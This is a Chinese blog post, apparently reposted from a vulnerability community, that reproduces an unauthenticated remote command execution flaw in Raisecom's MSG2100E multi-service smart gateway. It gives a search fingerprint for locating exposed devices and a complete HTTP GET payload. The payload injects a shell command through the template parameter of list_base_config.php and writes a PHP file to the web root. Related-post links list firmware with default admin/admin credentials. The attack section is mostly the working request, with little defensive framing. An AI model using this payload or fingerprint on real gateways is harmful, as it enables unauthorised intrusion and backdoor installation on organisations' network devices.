漏洞复现-R24-1瑞斯康达-多业务智能网关-RCE

于 2024-07-30 21:23:18 发布
阅读量149 收藏 2
点赞数
分类专栏: 漏洞复现~ 文章标签: 网络安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuwenshequ/article/details/140807096
版权

本文来自无问社区,更多漏洞信息可前往查看icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/12523.html

0x01 产品简介

MSG2100E系列融合型多业务智能网关是瑞斯康达公司面向中小企业及行业分支机构推出的新一代语音融合接入型网络产品。

0x02 漏洞概述

瑞斯康达-多业务智能网关 list_base_config.php 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

body="/images/raisecom/back.gif" && title=="Web user login"

图片

0x04 漏洞复现

命令执行写文件
payload:

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close

效果图:

图片

验证图:

图片

无问社区
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
瑞斯康-业务智能 list_base_config.php 远程命令执行漏洞
0xSec
07-26 658
瑞斯康-业务智能 list_base_config.php 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞瑞斯康-业务智能 list_base_config.php RCE
今天是几号的博客
07-27 475
瑞斯康-业务智能 list base config.php 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
瑞斯康-业务智能 list_base_config.php 远程命令执行漏洞
weixin_43167326的博客
07-29 939
瑞斯康业务智能是一款集多种功能于一体的络设备,专为中小企业及行业分支机构设计,以满足其多业务接入和带宽提速的需求,如MSG2100E系列、MSG2300系列等,是瑞斯康科技发展股份有限公司推出的新一代络产品。这些集成了数据、语音、安全、无线等多种功能,能够为用户提供综合、完整的络接入解决方案。它们广泛应用于政企单位、商务楼宇、校园、工业园区等场景,为用户带来高效、便捷的络体验。
安全设备(防火墙//安全审计系统)RCE漏洞
qq_45936921的博客
12-17 596
安全设备(防火墙//安全审计系统)RCE漏洞
瑞斯康MSG2100E-16V原厂-固件
09-09
瑞斯康MSG2100E-16原厂-固件,瑞斯康MSG2100E-8V原厂bin,瑞斯康MSG2100E-8V原厂-固件账号:admin 密码:admin
瑞斯康MSG2100E-32V原厂-固件
09-09
瑞斯康MSG2100E-32V原厂-固件, 瑞斯康MSG2100E-32V原厂-固件账号 admin 密码 admin 升级后 重启光猫
瑞斯康MSG2200E-32V固件
01-22
瑞斯康MSG2200E-32V固件
瑞斯康MSG2100E-8V原厂-固件.bin
09-09
瑞斯康MSG2100E-8V原厂-固件,瑞斯康MSG2100E-8V原厂bin,瑞斯康MSG2100E-8V原厂-固件账号:admin admin
瑞斯康-波分产品介绍及原理应用
12-03
瑞斯康-波分产品介绍及原理应用(含OPCOM100-OMU6、OPCOM100-OMU8、OPCOM100-OMU12、OPCOM100-OMU18等产品介绍及应用原理,光模块配备)
一文解读,络安全行业人才需求情况《络安全产业人才发展报告》
weixin_59086772的博客
10-18 8353
随着近几天国家络安全宣传周在全国各地开展活动,络安全再一次成为热门话题。络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对络安全颇有兴趣的朋友非常心行业前景如何?该怎么提升自我能力,更快地加入安行列。 今天雨笋君就10月13日在络安全宣传周上发布的《2021络安全人才报告》进行一个简单的行业前景分析。 一、络安全行业市场发展情况 络时代生活越来越离不开络,与此同时发生的络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1036
本指南仅注安全性和隐私性,而不注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
确保汽车电子电气系统安全:ISO 26262合规性实施指南
yayuanjingkeji的博客
07-30 349
阅读和理解ISO 26262的各个部分,包括通则、管理功能安全、概念阶段、系统级功能安全、硬件级功能安全、软件级功能安全和生产、运营、维护、报废阶段的功能安全要求。- 建立一个有效的FSM,包括安全管理体系、功能安全计划、功能安全评估、危害分析和风险评估(HARA)、安全概念(FSC)和技术安全需求(TSR)。- 确定适用的ASIL(汽车安全完整性等级)级别,ASIL分为A、B、C、D四个级别,等级越高,安全要求越严格。- 在运营和维护阶段,实施有效的监控和维护程序,确保系统的持续安全运行。
络安全自学从入门到精通的制胜攻略!!!
2301_77160226的博客
07-27 202
在信息时代,络安全已成为至重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
OWASP ZAP:一款功能强大的开源Web安全扫描工具
Coder加油站的专栏
07-27 821
OWASP ZAP是一个功能强大的Web应用程序安全扫描工具,适用于各种开发、测试和生产环境。通过自动扫描、手动测试、被动扫描和主动扫描等多种功能,ZAP能够帮助用户全面评估Web应用程序的安全性。此外,ZAP还提供了强大的API、插件和扩展功能,可以与CI/CD流水线集成,自动化地进行安全测试
络安全相竞赛比赛
黑战士的博客
07-18 1272
湖南省委信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛站链接(2023版)键字:比赛、CTF、赛事、技能挑战。浙江省大学生络与信息安全竞赛。全国络安全行业职业技能大赛。湖南省“安湘军杯”
qt练习控件label控件-lineEdit控件样例代码
最新发布
07-30
qt练习控件label控件-lineEdit控件样例代码
【JCR一区级】麻雀搜索算法SSA-CNN-LSTM-Attention故障诊断分类预测【含源码 5689期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Attention分类系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Attention分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Attention分类 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Attention分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Attention分类 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Attention分类
详解MATLAB Simulink通信系统建模与仿真
07-30
第1 章 MATLAB 基础与通信系统仿真 1.1 MATLAB 简介 1.2 MATLAB 程序设计 1.3 通信系统仿真 第2 章 Simulink 仿真基础 2.1 Simulink 简介 2.2 Simulink 工作环境 2.3 Simulink 仿真的基本方法 2.4 创建自己的模块库 2.5 S-函数的编写 第3 章 通信信号与系统分析 3.1 离散信号和系统 3.2 Fourier 分析 3.3 带通信号的低通等效 3.4 随机信号分析 第4 章 信道 4.1 加性高斯白噪声信道 4.2 多径衰落信道 第5 章 模拟调制 5.1 幅度调制 5.2 角度调制 第6 章 数字基带传输 6.1 概述 6.2 二进制基带信号传输 6.3 基带PAM 信号传输 6.4 带限信道的信号传输 第7 章 数字信号载波传输 7.1 概述 7.2 载波幅度调制(PAM) 7.3 载波相位调制(PSK) 7.4 正交幅度调制(QAM) 7.5 载波频率调制(FSK) 第8 章 信道编码和交织 8.1 概述 8.2 线性分组码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值